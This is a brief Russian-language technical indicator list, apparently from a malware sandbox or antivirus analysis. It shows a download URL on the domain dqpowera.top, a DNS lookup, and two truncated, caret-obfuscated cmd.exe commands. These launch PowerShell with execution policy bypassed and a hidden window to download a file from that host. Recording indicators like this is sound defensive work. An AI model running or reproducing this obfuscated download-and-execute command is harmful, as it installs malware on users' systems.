Техническая информация
- http://www.dqpowera.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^WErshE^L^L.exE -^E^X^Ec^uTIonP^ol^ICY Byp^as^S -^No^Pro^F^Ile -WiN^d^O^wst^YlE^ ^HIddeN ^(^new-ob^JE^cT SyS^tem.^neT^.WeBc^liE^NT).DO^w^nLOa^d^file('http://www.dqpowera....
- DNS ASK dq###era.top
- '<SYSTEM32>\cmd.exe' /c "p^O^WErshE^L^L.exE -^E^X^Ec^uTIonP^ol^ICY Byp^as^S -^No^Pro^F^Ile -WiN^d^O^wst^YlE^ ^HIddeN ^(^new-ob^JE^cT SyS^tem.^neT^.WeBc^liE^NT).DO^w^nLOa^d^file('http://www.dqpowera....' (со скрытым окном)